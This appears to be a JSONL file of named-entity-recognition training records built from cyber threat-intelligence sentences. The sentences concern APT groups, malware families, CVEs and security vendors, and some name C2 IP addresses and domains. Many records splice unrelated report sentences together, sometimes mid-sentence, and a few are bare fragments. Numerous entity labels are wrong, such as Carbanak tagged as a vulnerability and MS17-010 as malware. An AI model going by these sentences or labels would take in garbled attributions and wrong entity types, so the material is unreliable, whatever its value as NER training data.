{"text": "Infection VectorWe have observed this recent wave of Zyklon malware being delivered primarily through spam emails . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies .", "spans": {"THREAT_ACTOR: Zyklon": [[53, 59]], "TOOL: spam emails": [[102, 113]], "THREAT_ACTOR: APT33": [[146, 151]], "FILEPATH: malicious file": [[218, 232]]}, "info": {"id": "cyberner_stix_train_007249", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 104.218.120.128 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "IP_ADDRESS: 104.218.120.128": [[11, 26]]}, "info": {"id": "cyberner_stix_train_007250", "source": "cyberner_stix_train"}}
{"text": "This family showcases the amount of resources that malware authors now have to expend . Our research indicates that it has started targeting Japanese users . Then there is the dll install name , the domain , and the port . Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": {"ORGANIZATION: Japanese users": [[141, 155]], "TOOL: dll": [[176, 179]], "ORGANIZATION: Talos": [[223, 228]], "TOOL: Foxit PDF Reader": [[268, 284]]}, "info": {"id": "cyberner_stix_train_007251", "source": "cyberner_stix_train"}}
{"text": "Attackers exploiting the vulnerability can corrupt memory and gain remote code execution .", "spans": {}, "info": {"id": "cyberner_stix_train_007252", "source": "cyberner_stix_train"}}
{"text": "With the help of the open-source Android Dynamic Binary Instrumentation Toolkit and root privilege , it is possible to intercept any function execution . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . . A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend .", "spans": {"SYSTEM: Android": [[33, 40]], "THREAT_ACTOR: criminal groups": [[182, 197]], "THREAT_ACTOR: PoSeidon": [[258, 266]], "VULNERABILITY: Carbanak": [[302, 310]], "THREAT_ACTOR: criminal organization": [[328, 349]], "THREAT_ACTOR: Carbon Spider": [[362, 375]], "THREAT_ACTOR: Cl0p": [[382, 386]]}, "info": {"id": "cyberner_stix_train_007253", "source": "cyberner_stix_train"}}
{"text": "The code makes use of the Windows Crypto API for 3DES and the decryption key is stored as a standard Windows PUBLICKEYSTRUC structure .", "spans": {"SYSTEM: Windows": [[26, 33], [101, 108]], "TOOL: Crypto": [[34, 40]], "TOOL: PUBLICKEYSTRUC": [[109, 123]]}, "info": {"id": "cyberner_stix_train_007254", "source": "cyberner_stix_train"}}
{"text": "While we know that TEMP.Veles deployed the TRITON attack framework , we do not have specific evidence to prove that CNIIHM did ( or did not ) develop the tool .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[19, 29]], "MALWARE: TRITON": [[43, 49]], "ORGANIZATION: CNIIHM": [[116, 122]]}, "info": {"id": "cyberner_stix_train_007255", "source": "cyberner_stix_train"}}
{"text": "Per the domain ’s WHOIS record , an anonymized registrant registered com-ho.me in October 2016 and used it to serve malicious documents with similar macro activation features .", "spans": {"DOMAIN: com-ho.me": [[69, 78]]}, "info": {"id": "cyberner_stix_train_007256", "source": "cyberner_stix_train"}}
{"text": "WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . The Turla espionage group has been targeting various institutions for many years .", "spans": {"TOOL: WannaCry": [[0, 8]], "VULNERABILITY: EternalBlue": [[44, 55]], "THREAT_ACTOR: Shadow Brokers": [[85, 99]], "THREAT_ACTOR: Turla": [[125, 130]]}, "info": {"id": "cyberner_stix_train_007257", "source": "cyberner_stix_train"}}
{"text": "The Conflict between Hamas and Fatah : The historical rivalry between the Hamas and Fatah has resulted in many open battles between the two entities .", "spans": {"ORGANIZATION: Hamas": [[21, 26], [74, 79]], "ORGANIZATION: Fatah": [[31, 36], [84, 89]]}, "info": {"id": "cyberner_stix_train_007258", "source": "cyberner_stix_train"}}
{"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems .", "spans": {"MALWARE: RTF": [[5, 8]], "VULNERABILITY: CVE-2017_1882": [[28, 41]], "MALWARE: eqnedt32.exe": [[45, 57]]}, "info": {"id": "cyberner_stix_train_007259", "source": "cyberner_stix_train"}}
{"text": "The threat actors appear to have leveraged publicly available exploit code that can be found on Github at the URL : https://github.com/rxwx/CVE-2017-8570 . For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community .", "spans": {"THREAT_ACTOR: threat actors": [[4, 17]], "ORGANIZATION: Tibetan community": [[266, 283]]}, "info": {"id": "cyberner_stix_train_007260", "source": "cyberner_stix_train"}}
{"text": "T1444 Masquerade as Legitimate Application Impersonates legitimate GAS Tecnologia application . Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": {"SYSTEM: GAS Tecnologia": [[67, 81]], "ORGANIZATION: Symantec": [[96, 104]], "TOOL: Mimikatz": [[134, 142]], "THREAT_ACTOR: Waterbug": [[176, 184]], "ORGANIZATION: McAfee Advanced Threat Research": [[191, 222]], "FILEPATH: data-gathering implant": [[260, 282]]}, "info": {"id": "cyberner_stix_train_007261", "source": "cyberner_stix_train"}}
{"text": "When the adversaries' operations are live , they modify the record again to point the C2 domain to an IP address they can access .", "spans": {"TOOL: C2": [[86, 88]]}, "info": {"id": "cyberner_stix_train_007262", "source": "cyberner_stix_train"}}
{"text": "This engineer ’ s name is also associated with a company called eSurv S.R.L . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . The threat group in this recently observed campaign a TEMP.Zagros a weaponized their malware using the following techniques .", "spans": {"ORGANIZATION: eSurv S.R.L .": [[64, 77]], "THREAT_ACTOR: CopyKittens": [[109, 120]], "TOOL: Metasploit": [[125, 135]], "TOOL: Mimikatz": [[258, 266]], "TOOL: Empire": [[333, 339]], "TOOL: PowerShell": [[344, 354]]}, "info": {"id": "cyberner_stix_train_007263", "source": "cyberner_stix_train"}}
{"text": "System applications with root , by contrast , have super-user permissions that allow them to break out of such sandboxes . CTU researchers also identified components in the custom C2 protocol being used which they have seen utilized by Nickel Academy ( Lazarus ) previously . APT33 : 89.34.237.118 mywinnetwork.ddns.net . Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the “ PIG RANGE ” .", "spans": {"ORGANIZATION: CTU": [[123, 126]], "TOOL: custom C2 protocol": [[173, 191]], "THREAT_ACTOR: Nickel Academy": [[236, 250]], "THREAT_ACTOR: Lazarus": [[253, 260]], "THREAT_ACTOR: APT33": [[276, 281]], "IP_ADDRESS: 89.34.237.118": [[284, 297]], "DOMAIN: mywinnetwork.ddns.net": [[298, 319]], "THREAT_ACTOR: Hack520": [[354, 361]]}, "info": {"id": "cyberner_stix_train_007264", "source": "cyberner_stix_train"}}
{"text": "It was primarily notable for its high-volume campaigns and its association with TA505 , given the actor ’s propensity for massive campaigns and ability to dominate the email landscape .", "spans": {"THREAT_ACTOR: TA505": [[80, 85]], "TOOL: email": [[168, 173]]}, "info": {"id": "cyberner_stix_train_007265", "source": "cyberner_stix_train"}}
{"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": {"THREAT_ACTOR: actors": [[15, 21]], "VULNERABILITY: CVE-2017-0144": [[109, 122]], "MALWARE: MS17-010": [[162, 170]], "VULNERABILITY: CVE-2012-0158": [[237, 250]], "VULNERABILITY: CVE-2013-3906": [[253, 266]], "VULNERABILITY: CVE-2014-1761": [[270, 283]]}, "info": {"id": "cyberner_stix_train_007266", "source": "cyberner_stix_train"}}
{"text": "This newest entry seems to indicate that these changes won ’ t be stopping soon . Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics . After writing the data received from the controller, a function is called to process the received . The UK , on the other hand , emerged as the second - largest ransomware target , enduring close to 200 ransomware attacks .", "spans": {"THREAT_ACTOR: threat actors": [[229, 242]]}, "info": {"id": "cyberner_stix_train_007267", "source": "cyberner_stix_train"}}
{"text": "PLATINUM often spear phishes its targets at their non-official or private email accounts , to use as a stepping stone into the intended organization 's network . one organization is located in the US .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]]}, "info": {"id": "cyberner_stix_train_007268", "source": "cyberner_stix_train"}}
{"text": "These changes include : Removing the SYSTEM_ALERT_WINDOW error and alert window types , and introducing a few other types as replacement Elevating the permission status of SYSTEM_ALERT_WINDOW to special permission by putting it into the “ above dangerous ” category , which means that users have to go through many screens to approve apps that ask for permission , instead of just one click Introducing an overlay kill switch on Android 8.0 and later that users can activate anytime to deactivate a system alert window To adapt , Android malware evolved to misusing The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee . , The focus should be on isolating the affected devices andor networks to prevent further spread and minimize the impact .", "spans": {"SYSTEM: Android 8.0": [[429, 440]], "SYSTEM: Android": [[530, 537]], "TOOL: Word document": [[586, 599]], "MALWARE: manual.doc": [[600, 610]], "THREAT_ACTOR: Honeybee": [[680, 688]]}, "info": {"id": "cyberner_stix_train_007269", "source": "cyberner_stix_train"}}
{"text": "TA505 continued distributing Dridex through early June 2017 using a range of email attachments .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Dridex": [[29, 35]], "TOOL: email": [[77, 82]]}, "info": {"id": "cyberner_stix_train_007270", "source": "cyberner_stix_train"}}
{"text": "Some hackers even went onto use the Cisco exploits in the wild . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) .", "spans": {"VULNERABILITY: Cisco exploits": [[36, 50]], "TOOL: Microsoft Office": [[113, 129]], "VULNERABILITY: CVE-2017-11882": [[146, 160]]}, "info": {"id": "cyberner_stix_train_007271", "source": "cyberner_stix_train"}}
{"text": "Note that the 104.168.167.16 server is used as a C2 server .", "spans": {"IP_ADDRESS: 104.168.167.16": [[14, 28]], "TOOL: C2": [[49, 51]]}, "info": {"id": "cyberner_stix_train_007272", "source": "cyberner_stix_train"}}
{"text": "tcpdo [ . During multiple engagements , APT41 attempted to remove evidence of some of its activity by deleting Bash histories , clearing Windows security and system events , and modifying DNS management to avoid anti-virus detections . APT29 has used The Onion Router and the TOR domain fronting plugin meek to create a hidden , encrypted network tunnel that appeared to connect to Google services over TLS .", "spans": {"THREAT_ACTOR: APT41": [[40, 45]], "THREAT_ACTOR: APT29": [[236, 241]], "MALWARE: The Onion Router": [[251, 267]], "MALWARE: TOR domain fronting plugin meek": [[276, 307]], "ORGANIZATION: Google": [[382, 388]]}, "info": {"id": "cyberner_stix_train_007273", "source": "cyberner_stix_train"}}
{"text": "SpyNote RAT was designed to function only over Wi-Fi , which is the preferable mode for Android malware to send files to C & C . On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign . Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed .", "spans": {"MALWARE: SpyNote RAT": [[0, 11]], "SYSTEM: Android": [[88, 95]], "THREAT_ACTOR: group": [[158, 163]], "ORGANIZATION: financial": [[191, 200]], "THREAT_ACTOR: Cobalt": [[268, 274]], "ORGANIZATION: banks": [[300, 305]], "ORGANIZATION: financial institutions": [[310, 332]]}, "info": {"id": "cyberner_stix_train_007274", "source": "cyberner_stix_train"}}
{"text": "In total , there are 32 different routines , each of them implementing a different opcode and some basic functionality that the malware program may execute . The oldest sample we found was created in 2009 , indicating this tool has been in use for almost seven years . There is no way around this : the attackers are simply not interested in computers configured with those languages . The malware uses stack strings followed by a single bitwise operation .", "spans": {"MALWARE: The malware": [[386, 397]]}, "info": {"id": "cyberner_stix_train_007275", "source": "cyberner_stix_train"}}
{"text": "ORat and Cobalt Strike C2 server : strust.club .", "spans": {"MALWARE: ORat": [[0, 4]], "TOOL: Cobalt Strike": [[9, 22]], "TOOL: C2": [[23, 25]], "DOMAIN: strust.club": [[35, 46]]}, "info": {"id": "cyberner_stix_train_007276", "source": "cyberner_stix_train"}}
{"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "MALWARE: Infy": [[126, 130]], "MALWARE: malware": [[131, 138]], "ORGANIZATION: Iranians": [[158, 166]], "ORGANIZATION: broadcast journalist": [[246, 266]], "ORGANIZATION: BBC Persian": [[270, 281]], "TOOL: PowerPoint": [[316, 326]]}, "info": {"id": "cyberner_stix_train_007277", "source": "cyberner_stix_train"}}
{"text": "Backdoor.APT.PittyTiger – This malware is the classic \" PittyTiger \" malware ( PittyTigerV1.0 ) that was heavily used by this group in 2012 - 2013 . To control the full operation , MoneyTaker uses a Pentest framework Server .", "spans": {"TOOL: Backdoor.APT.PittyTiger": [[0, 23]], "THREAT_ACTOR: PittyTiger": [[56, 66]], "TOOL: PittyTigerV1.0": [[79, 93]], "THREAT_ACTOR: group": [[126, 131]], "THREAT_ACTOR: MoneyTaker": [[181, 191]], "MALWARE: Pentest framework Server": [[199, 223]]}, "info": {"id": "cyberner_stix_train_007278", "source": "cyberner_stix_train"}}
{"text": "CVE-2014-0515 exploits a vulnerability in Flash ’s Shader processing , whereas CVE-2015-3043 exploits a vulnerability in Flash ’s FLV processing .", "spans": {"VULNERABILITY: CVE-2014-0515": [[0, 13]], "TOOL: Flash": [[42, 47], [121, 126]], "VULNERABILITY: CVE-2015-3043": [[79, 92]], "TOOL: FLV": [[130, 133]]}, "info": {"id": "cyberner_stix_train_007279", "source": "cyberner_stix_train"}}
{"text": "First , Volatility 's pstree plugin , which lists running processes in a tree view , was executed .", "spans": {"TOOL: Volatility": [[8, 18]], "TOOL: pstree": [[22, 28]], "TOOL: plugin": [[29, 35]]}, "info": {"id": "cyberner_stix_train_007280", "source": "cyberner_stix_train"}}
{"text": "It does this by using infected devices to imitate clicks on the install , buy , and accept buttons . In November 2017 , SecureWorks Counter Threat Unit ( CTU ) researchers investigated a widespread and opportunistic WCry ransomware campaign that impacted many systems around the world . APT33 : 162.250.145.204 mynetwork.ddns.net . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": {"ORGANIZATION: SecureWorks Counter Threat Unit": [[120, 151]], "ORGANIZATION: CTU": [[154, 157]], "THREAT_ACTOR: APT33": [[287, 292]], "IP_ADDRESS: 162.250.145.204": [[295, 310]], "DOMAIN: mynetwork.ddns.net": [[311, 329]], "ORGANIZATION: institutions in the legal and governmental fields .": [[409, 460]]}, "info": {"id": "cyberner_stix_train_007281", "source": "cyberner_stix_train"}}
{"text": "In this case , the first sample I looked at stood out for another reason entirely .", "spans": {}, "info": {"id": "cyberner_stix_train_007282", "source": "cyberner_stix_train"}}
{"text": "The relevant handler of the client is called , collects the system information and sends it back inside IPacket of GetSystemInfoResponse .", "spans": {}, "info": {"id": "cyberner_stix_train_007283", "source": "cyberner_stix_train"}}
{"text": "The QiAnXin keeps a close eye on activities made by OceanLotus . McAfee concludes that some groups—and especially the Poetry Group —have shifted tactics to use Citadel in ACTs other than what it was originally intended for . McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . In November 2017 , Talos observed the Group123 , which included a new version of ROKRAT being used in the latest wave of attacks . In addition to TALOS investigation on KONNI , on July 18 2017 , BitDefender released a whitepaper on DarkHotel . According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . ESET has also reported PowerShell scripts being used by Turla to provide direct , in-memory loading and execution of malware . Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government . Symantec researchers have uncovered evidence that the Waterbug APT group has conducted a hostile takeover of an attack platform . Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor . Kaspersky found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager . Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group , primarily focused on cyber-espionage in Asia . LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East . Talos published its analysis of the BlackWater campaign , related to MuddyWater group . Trend Micro also reported MuddyWater’s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . Regarding other groups , Kaspersky discovered new activity related to ZooPark , a cyber-espionage threat actor that has focused mainly on stealing data from Android devices . Recorded Future published an analysis of the infrastructure built by APT33 ( aka Elfin ) to target Saudi organizations .", "spans": {"ORGANIZATION: QiAnXin": [[4, 11]], "THREAT_ACTOR: OceanLotus": [[52, 62]], "ORGANIZATION: McAfee": [[65, 71], [225, 231]], "THREAT_ACTOR: Group": [[125, 130]], "THREAT_ACTOR: Lazarus": [[289, 296], [444, 451]], "FILEPATH: malicious document": [[418, 436]], "ORGANIZATION: Talos": [[499, 504], [1983, 1988]], "THREAT_ACTOR: Group123": [[518, 526]], "ORGANIZATION: TALOS": [[626, 631]], "MALWARE: KONNI": [[649, 654]], "THREAT_ACTOR: DarkHotel": [[712, 721]], "ORGANIZATION: 360 Threat Intelligence Center": [[746, 776]], "FILEPATH: njRAT backdoor": [[825, 839]], "ORGANIZATION: ESET": [[842, 846]], "MALWARE: PowerShell scripts": [[865, 883]], "THREAT_ACTOR: Turla": [[898, 903], [1062, 1067], [1107, 1112]], "ORGANIZATION: Kaspersky": [[982, 991], [1482, 1491], [2209, 2218]], "FILEPATH: backdoor": [[1009, 1017]], "ORGANIZATION: Symantec": [[1085, 1093], [1179, 1187]], "ORGANIZATION: government": [[1166, 1176]], "THREAT_ACTOR: Waterbug": [[1233, 1241]], "ORGANIZATION: Microstep Intelligence Bureau": [[1328, 1357]], "ORGANIZATION: Ukrainian government": [[1409, 1429]], "THREAT_ACTOR: Gamaredon": [[1457, 1466]], "THREAT_ACTOR: SixLittleMonkeys": [[1548, 1564]], "MALWARE: Microcin Trojan": [[1596, 1611]], "MALWARE: RAT": [[1618, 1621]], "ORGANIZATION: Trend Micro": [[1662, 1673], [2071, 2082]], "THREAT_ACTOR: BlackTech": [[1749, 1758]], "THREAT_ACTOR: LuckyMouse": [[1814, 1824]], "ORGANIZATION: Palo Alto": [[1846, 1855]], "MALWARE: web shells": [[1890, 1900]], "ORGANIZATION: government organizations": [[1937, 1961]], "THREAT_ACTOR: MuddyWater": [[2052, 2062]], "THREAT_ACTOR: MuddyWater’s": [[2097, 2109]], "FILEPATH: POWERSTATS v3": [[2168, 2181]], "THREAT_ACTOR: groups": [[2200, 2206]], "THREAT_ACTOR: ZooPark": [[2254, 2261]], "SYSTEM: Android": [[2341, 2348]], "ORGANIZATION: Recorded Future": [[2359, 2374]], "THREAT_ACTOR: APT33": [[2428, 2433]], "THREAT_ACTOR: Elfin": [[2440, 2445]]}, "info": {"id": "cyberner_stix_train_007284", "source": "cyberner_stix_train"}}
{"text": "a keylogger that works in every app installed on the Android device . Butterfly has also shown an interest in the commodities sector , attacking two major companies involved in gold and oil in late 2014 . So far , the groups have not used any zero-days . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": {"SYSTEM: Android": [[53, 60]], "THREAT_ACTOR: Butterfly": [[70, 79]], "ORGANIZATION: commodities sector": [[114, 132]], "ORGANIZATION: gold": [[177, 181]], "ORGANIZATION: oil": [[186, 189]], "VULNERABILITY: zero-days": [[243, 252]], "ORGANIZATION: Mastodon": [[303, 311]], "ORGANIZATION: Randy McEoin": [[320, 332]]}, "info": {"id": "cyberner_stix_train_007285", "source": "cyberner_stix_train"}}
{"text": "In the injected payload , the module implements the method ‘ callActivityOnCreate ’ . This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran . It removes setup.exe ’s contents and replaces them with the third decrypted executable , a cryptocurrency miner . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": {"FILEPATH: setup.exe": [[243, 252]], "ORGANIZATION: Malwarebytes EDR and MDR": [[346, 370]]}, "info": {"id": "cyberner_stix_train_007286", "source": "cyberner_stix_train"}}
{"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": {"MALWARE: malware": [[15, 22]], "FILEPATH: bait document": [[155, 168]], "TOOL: Word": [[218, 222]], "VULNERABILITY: CVE-2012-0158": [[252, 265]], "VULNERABILITY: exploit": [[266, 273]]}, "info": {"id": "cyberner_stix_train_007287", "source": "cyberner_stix_train"}}
{"text": "The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party . With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate . Older versions of WEBC2 read data between HTML comments , though over time WEBC2 variants have evolved to read data contained within other types of tags . \" Having infected gaming companies that do business in MMORPG , the attackers potentially get access to millions of users , \" the researchers wrote .", "spans": {"ORGANIZATION: Fatah": [[159, 164]], "TOOL: GozNym": [[188, 194]], "ORGANIZATION: bank": [[245, 249]], "TOOL: URL": [[253, 256]], "TOOL: SSL certificate": [[261, 276]], "MALWARE: WEBC2": [[297, 302], [354, 359]], "TOOL: HTML": [[321, 325]], "ORGANIZATION: gaming companies": [[452, 468]], "THREAT_ACTOR: attackers": [[502, 511]]}, "info": {"id": "cyberner_stix_train_007288", "source": "cyberner_stix_train"}}
{"text": "In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure .", "spans": {"VULNERABILITY: Carbanak": [[29, 37]], "ORGANIZATION: financial institution": [[68, 89]], "FILEPATH: malicious file": [[242, 256]]}, "info": {"id": "cyberner_stix_train_007289", "source": "cyberner_stix_train"}}
{"text": "CONTACTS_PRO – request unique message text for contacts from the address book . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army .", "spans": {"MALWARE: cmd.exe": [[160, 167]], "THREAT_ACTOR: hacker": [[302, 308]], "THREAT_ACTOR: Ashiyane": [[378, 386]], "THREAT_ACTOR: Sun Army": [[438, 446]]}, "info": {"id": "cyberner_stix_train_007290", "source": "cyberner_stix_train"}}
{"text": "What we found were several other fake apps developed using the SpyNote builder , which should come as a warning to Android users . On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 (see section ‘Attack timeline’) . The hacking group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia .", "spans": {"MALWARE: SpyNote": [[63, 70]], "SYSTEM: Android": [[115, 122]], "THREAT_ACTOR: Silence": [[152, 159]], "ORGANIZATION: Financial": [[258, 267]], "MALWARE: Cobalt Strike": [[344, 357]], "THREAT_ACTOR: cyber heists": [[393, 405]], "ORGANIZATION: financial institutions": [[417, 439]]}, "info": {"id": "cyberner_stix_train_007291", "source": "cyberner_stix_train"}}
{"text": "android.intent.action.PACKAGE_INSTALL System notification that the download and eventual installation of an app package is happening ( this is deprecated ) android.intent.action.PACKAGE_ADDED System notification that a new app package has been installed on the device , including the name of said package . In 2018 , the group inserted CRACKSHOT malware into game files that were signed with legitimate codesigning certificates , most likely indicating access to the production environment , which facilitated a supply chain compromise . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": {"THREAT_ACTOR: group": [[321, 326]], "THREAT_ACTOR: APT28": [[542, 547]], "ORGANIZATION: Russian government": [[573, 591]], "ORGANIZATION: military": [[697, 705]], "ORGANIZATION: government": [[710, 720]]}, "info": {"id": "cyberner_stix_train_007292", "source": "cyberner_stix_train"}}
{"text": "Victims who used the torrent files to download the applications would end up getting infected with OnionDuke .", "spans": {"MALWARE: OnionDuke": [[99, 108]]}, "info": {"id": "cyberner_stix_train_007293", "source": "cyberner_stix_train"}}
{"text": "It also disables Play Protect ( Google ’ s preinstalled antivirus solution ) to prevent its discovery and deletion in the future . There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"SYSTEM: Play Protect": [[17, 29]], "ORGANIZATION: Google": [[32, 38]], "THREAT_ACTOR: SectorJ04's": [[167, 178]], "VULNERABILITY: zero-day": [[354, 362]], "VULNERABILITY: exploit": [[363, 370]], "THREAT_ACTOR: Gamma Group": [[496, 507]]}, "info": {"id": "cyberner_stix_train_007294", "source": "cyberner_stix_train"}}
{"text": "Symantec products block attempts to install Lojax with the detection name Trojan.Lojax .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "MALWARE: Lojax": [[44, 49]], "FILEPATH: Trojan.Lojax": [[74, 86]]}, "info": {"id": "cyberner_stix_train_007295", "source": "cyberner_stix_train"}}
{"text": "CONCLUSION We witness actors continually using open-source platforms , code and packages to create their own software . We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University . APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": {"THREAT_ACTOR: APT12": [[306, 311]], "TOOL: Cobalt Strike": [[620, 633]], "TOOL: Mimikatz": [[637, 645]]}, "info": {"id": "cyberner_stix_train_007296", "source": "cyberner_stix_train"}}
{"text": "The exploit payload contains following file components : Component name Description run_root_shell/arrs_put_user.o/arrs_put_user/poc Exploit ELF db Sqlite3 tool ELF device.db Sqlite3 database with supported devices and their constants needed for privilege escalation ‘ device.db ’ is a database used by the exploit . Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file . SilverTerrier mainly targets organizations in high technology , higher education , and manufacturing .", "spans": {"THREAT_ACTOR: Ratsnif": [[345, 352]], "THREAT_ACTOR: SilverTerrier": [[394, 407]]}, "info": {"id": "cyberner_stix_train_007297", "source": "cyberner_stix_train"}}
{"text": "The relevant strings inside the VAD sections were UTF-16 encoded and revealed additional insights once extracted .", "spans": {"TOOL: VAD": [[32, 35]], "TOOL: UTF-16": [[50, 56]]}, "info": {"id": "cyberner_stix_train_007298", "source": "cyberner_stix_train"}}
{"text": "In our opinion , this insistence on using exploits that are already under heightened scrutiny suggests the existence of at least one of three circumstances .", "spans": {}, "info": {"id": "cyberner_stix_train_007299", "source": "cyberner_stix_train"}}
{"text": "Desktop banking malware often blocks the user ’ s access to their banking website after a successful transaction by using web injects that show a variety of “ service unavailable ” screens . Ransom demands have varied significantly , suggesting that INDRIK SPIDER likely calculates the ransom amount based on the size and value of the victim organization . The group uses an advanced piece of malware known as Remsec ( Backdoor.Remsec ) to conduct its attacks .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[250, 263]], "MALWARE: Remsec": [[410, 416]], "MALWARE: Backdoor.Remsec": [[419, 434]]}, "info": {"id": "cyberner_stix_train_007300", "source": "cyberner_stix_train"}}
{"text": "The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country .", "spans": {"THREAT_ACTOR: APT actor": [[4, 13]], "ORGANIZATION: financial services": [[81, 99]], "ORGANIZATION: telecoms": [[102, 110]], "ORGANIZATION: government": [[113, 123]], "ORGANIZATION: defense sectors": [[130, 145]], "MALWARE: GozNym": [[170, 176]], "ORGANIZATION: banks": [[220, 225]], "ORGANIZATION: community banks": [[317, 332]], "ORGANIZATION: email service providers": [[337, 360]]}, "info": {"id": "cyberner_stix_train_007301", "source": "cyberner_stix_train"}}
{"text": "The first variant is a “ first stage application , ” that performs basic profiling of a device , and under certain conditions attempts to download and install a much more comprehensive surveillanceware component , which is the second variant . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations . ZxShell exploits this fact by cycling between each of the names , verifying the existence of the real service . Sometimes this was a high profile , legitimate site such as ‘ diplomacy.pl ’ hosting a ZIP archive .", "spans": {"TOOL: WhiteBear": [[263, 272]], "ORGANIZATION: embassies": [[297, 306]], "MALWARE: ZxShell": [[353, 360]]}, "info": {"id": "cyberner_stix_train_007302", "source": "cyberner_stix_train"}}
{"text": "Over the past two years , Russia appears to have increasingly leveraged APT28 to conduct information operations commensurate with broader strategic military doctrine .", "spans": {"THREAT_ACTOR: APT28": [[72, 77]]}, "info": {"id": "cyberner_stix_train_007303", "source": "cyberner_stix_train"}}
